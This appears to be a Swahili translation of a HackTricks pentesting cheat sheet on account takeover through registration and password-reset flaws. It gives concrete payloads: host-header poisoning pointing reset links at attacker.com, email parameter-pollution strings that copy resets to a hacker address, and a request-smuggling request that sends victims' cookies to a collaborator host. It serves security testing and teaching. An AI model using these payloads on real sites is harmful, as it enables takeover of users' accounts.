mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 22:52:06 +00:00
230 lines
11 KiB
Markdown
230 lines
11 KiB
Markdown
# Usalama wa Usajili & Ukatili
|
|
|
|
{% hint style="success" %}
|
|
Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
|
|
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
|
|
|
</details>
|
|
{% endhint %}
|
|
|
|
### [WhiteIntel](https://whiteintel.io)
|
|
|
|
<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
[**WhiteIntel**](https://whiteintel.io) ni injini ya utafutaji inayotumiwa na **dark-web** ambayo inatoa kazi za **bure** kuangalia ikiwa kampuni au wateja wake wamekuwa **kuyumbishwa** na **stealer malwares**.
|
|
|
|
Lengo lao kuu la WhiteIntel ni kupambana na ukatili wa akaunti na mashambulizi ya ransomware yanayotokana na malware inayopora taarifa.
|
|
|
|
Unaweza kuangalia tovuti yao na kujaribu injini yao kwa **bure** kwenye:
|
|
|
|
{% embed url="https://whiteintel.io" %}
|
|
|
|
***
|
|
|
|
## Ukatili wa Usajili
|
|
|
|
### Usajili wa Nakala
|
|
|
|
* Jaribu kuunda kwa kutumia jina la mtumiaji lililopo
|
|
* Angalia kubadilisha barua pepe:
|
|
* herufi kubwa
|
|
* \+1@
|
|
* ongeza nukta katika barua pepe
|
|
* wahusika maalum katika jina la barua pepe (%00, %09, %20)
|
|
* Weka wahusika weusi baada ya barua pepe: `test@test.com a`
|
|
* victim@gmail.com@attacker.com
|
|
* victim@attacker.com@gmail.com
|
|
|
|
### Uhesabuji wa Jina la Mtumiaji
|
|
|
|
Angalia ikiwa unaweza kubaini wakati jina la mtumiaji tayari limeandikishwa ndani ya programu.
|
|
|
|
### Sera ya Nywila
|
|
|
|
Kuunda mtumiaji angalia sera ya nywila (angalia ikiwa unaweza kutumia nywila dhaifu).\
|
|
Katika hali hiyo unaweza kujaribu kubruteforce akauti.
|
|
|
|
### SQL Injection
|
|
|
|
[**Angalia ukurasa huu** ](sql-injection/#insert-statement)kujifunza jinsi ya kujaribu ukatili wa akaunti au kutoa taarifa kupitia **SQL Injections** katika fomu za usajili.
|
|
|
|
### Oauth Takeovers
|
|
|
|
{% content-ref url="oauth-to-account-takeover.md" %}
|
|
[oauth-to-account-takeover.md](oauth-to-account-takeover.md)
|
|
{% endcontent-ref %}
|
|
|
|
### SAML Vulnerabilities
|
|
|
|
{% content-ref url="saml-attacks/" %}
|
|
[saml-attacks](saml-attacks/)
|
|
{% endcontent-ref %}
|
|
|
|
### Badilisha Barua Pepe
|
|
|
|
Wakati umejiandikisha jaribu kubadilisha barua pepe na uone ikiwa mabadiliko haya yanathibitishwa vizuri au unaweza kuyabadilisha kuwa barua pepe zisizo na mpangilio.
|
|
|
|
### Ukaguzi Zaidi
|
|
|
|
* Angalia ikiwa unaweza kutumia **barua pepe za muda**
|
|
* **Nywila** **ndefu** (>200) inasababisha **DoS**
|
|
* **Angalia mipaka ya viwango kwenye uundaji wa akaunti**
|
|
* Tumia username@**burp\_collab**.net na uchambue **callback**
|
|
|
|
## **Ukatili wa Kurejesha Nywila**
|
|
|
|
### Kuvuja kwa Token ya Kurejesha Nywila Kupitia Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
|
|
|
|
1. Omba kurejesha nywila kwa anwani yako ya barua pepe
|
|
2. Bonyeza kwenye kiungo cha kurejesha nywila
|
|
3. Usibadilishe nywila
|
|
4. Bonyeza tovuti zozote za 3rd party (mfano: Facebook, twitter)
|
|
5. Kamatia ombi katika Burp Suite proxy
|
|
6. Angalia ikiwa kichwa cha referer kinavuja token ya kurejesha nywila.
|
|
|
|
### Ukatili wa Kurejesha Nywila <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
|
|
|
|
1. Kamatia ombi la kurejesha nywila katika Burp Suite
|
|
2. Ongeza au hariri vichwa vifuatavyo katika Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
|
|
3. Tuma ombi na kichwa kilichobadilishwa\
|
|
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
|
|
4. Tafuta URL ya kurejesha nywila kulingana na _host header_ kama: `https://attacker.com/reset-password.php?token=TOKEN`
|
|
|
|
### Kurejesha Nywila Kupitia Kigezo cha Barua Pepe <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
|
|
```powershell
|
|
# parameter pollution
|
|
email=victim@mail.com&email=hacker@mail.com
|
|
|
|
# array of emails
|
|
{"email":["victim@mail.com","hacker@mail.com"]}
|
|
|
|
# carbon copy
|
|
email=victim@mail.com%0A%0Dcc:hacker@mail.com
|
|
email=victim@mail.com%0A%0Dbcc:hacker@mail.com
|
|
|
|
# separator
|
|
email=victim@mail.com,hacker@mail.com
|
|
email=victim@mail.com%20hacker@mail.com
|
|
email=victim@mail.com|hacker@mail.com
|
|
```
|
|
### IDOR on API Parameters <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>
|
|
|
|
1. Mshambuliaji lazima aingie kwenye akaunti yao na aende kwenye kipengele cha **Badilisha nenosiri**.
|
|
2. Anza Burp Suite na uingilie ombi hilo.
|
|
3. Tuma kwenye tab ya repeater na uhariri vigezo: User ID/email\
|
|
`powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})`
|
|
|
|
### Weak Password Reset Token <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
|
|
|
|
Token ya kubadilisha nenosiri inapaswa kuundwa kwa bahati nasibu na kuwa ya kipekee kila wakati.\
|
|
Jaribu kubaini kama token hiyo inaisha muda au kama kila wakati ni ile ile, katika baadhi ya matukio algorithm ya uzalishaji ni dhaifu na inaweza kukisiwa. Vigezo vifuatavyo vinaweza kutumika na algorithm.
|
|
|
|
* Timestamp
|
|
* UserID
|
|
* Barua pepe ya Mtumiaji
|
|
* Jina la Kwanza na Jina la Mwisho
|
|
* Tarehe ya Kuzaliwa
|
|
* Cryptography
|
|
* Nambari pekee
|
|
* Mfuatano mdogo wa token (herufi kati ya \[A-Z,a-z,0-9])
|
|
* Tumia tena token
|
|
* Tarehe ya kumalizika kwa token
|
|
|
|
### Leaking Password Reset Token <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
|
|
|
|
1. Trigger ombi la kubadilisha nenosiri kwa kutumia API/UI kwa barua pepe maalum e.g: test@mail.com
|
|
2. Kagua jibu la seva na angalia kwa `resetToken`
|
|
3. Kisha tumia token hiyo katika URL kama `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
|
|
|
|
### Password Reset Via Username Collision <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
|
|
|
|
1. Jisajili kwenye mfumo kwa jina la mtumiaji linalofanana na jina la mtumiaji wa mwathirika, lakini ukiweka nafasi za wazi kabla na/au baada ya jina la mtumiaji. e.g: `"admin "`
|
|
2. Omba kubadilisha nenosiri kwa kutumia jina lako la mtumiaji la uhalifu.
|
|
3. Tumia token iliyotumwa kwa barua pepe yako na ubadilishe nenosiri la mwathirika.
|
|
4. Unganisha kwenye akaunti ya mwathirika kwa nenosiri jipya.
|
|
|
|
Jukwaa la CTFd lilikuwa na udhaifu kwa shambulio hili.\
|
|
Tazama: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
|
|
|
|
### Account Takeover Via Cross Site Scripting <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
|
|
|
|
1. Tafuta XSS ndani ya programu au subdomain ikiwa vidakuzi vimewekwa kwenye kikoa cha mzazi: `*.domain.com`
|
|
2. Leak **vidakuzi vya sasa vya sessions**
|
|
3. Thibitisha kama mtumiaji kwa kutumia cookie
|
|
|
|
### Account Takeover Via HTTP Request Smuggling <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
|
|
|
|
1\. Tumia **smuggler** kugundua aina ya HTTP Request Smuggling (CL, TE, CL.TE)\
|
|
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
|
|
2\. Tengeneza ombi ambalo litabadilisha `POST / HTTP/1.1` na data ifuatayo:\
|
|
`GET http://something.burpcollaborator.net HTTP/1.1 X:` kwa lengo la kufungua upya wa mwathirika kwenda burpcollab na kuiba vidakuzi vyao\
|
|
3\. Ombi la mwisho linaweza kuonekana kama ifuatavyo
|
|
```
|
|
GET / HTTP/1.1
|
|
Transfer-Encoding: chunked
|
|
Host: something.com
|
|
User-Agent: Smuggler/v1.0
|
|
Content-Length: 83
|
|
0
|
|
|
|
GET http://something.burpcollaborator.net HTTP/1.1
|
|
X: X
|
|
```
|
|
Hackerone inaripoti kutumia hitilafu hii\
|
|
\* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)\
|
|
\* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)
|
|
|
|
### Kuchukua Akaunti kupitia CSRF <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
|
|
|
|
1. Tengeneza payload kwa CSRF, mfano: “Fomu ya HTML yenye kuwasilisha kiotomatiki kwa ajili ya kubadilisha nenosiri”
|
|
2. Tuma payload
|
|
|
|
### Kuchukua Akaunti kupitia JWT <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
|
|
|
|
JSON Web Token inaweza kutumika kuthibitisha mtumiaji.
|
|
|
|
* Hariri JWT kwa ID ya Mtumiaji / Barua pepe nyingine
|
|
* Angalia saini dhaifu ya JWT
|
|
|
|
{% content-ref url="hacking-jwt-json-web-tokens.md" %}
|
|
[hacking-jwt-json-web-tokens.md](hacking-jwt-json-web-tokens.md)
|
|
{% endcontent-ref %}
|
|
|
|
## Marejeleo
|
|
|
|
* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)
|
|
|
|
### [WhiteIntel](https://whiteintel.io)
|
|
|
|
<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
[**WhiteIntel**](https://whiteintel.io) ni injini ya utafutaji inayotumiwa na **dark-web** ambayo inatoa kazi za **bure** kuangalia kama kampuni au wateja wake wamekuwa **kuyumbishwa** na **malware ya wizi**.
|
|
|
|
Lengo lao kuu la WhiteIntel ni kupambana na kuchukuliwa kwa akaunti na mashambulizi ya ransomware yanayotokana na malware ya wizi wa taarifa.
|
|
|
|
Unaweza kuangalia tovuti yao na kujaribu injini yao **bure** kwenye:
|
|
|
|
{% embed url="https://whiteintel.io" %}
|
|
|
|
{% hint style="success" %}
|
|
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
|
|
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
|
|
|
</details>
|
|
{% endhint %}
|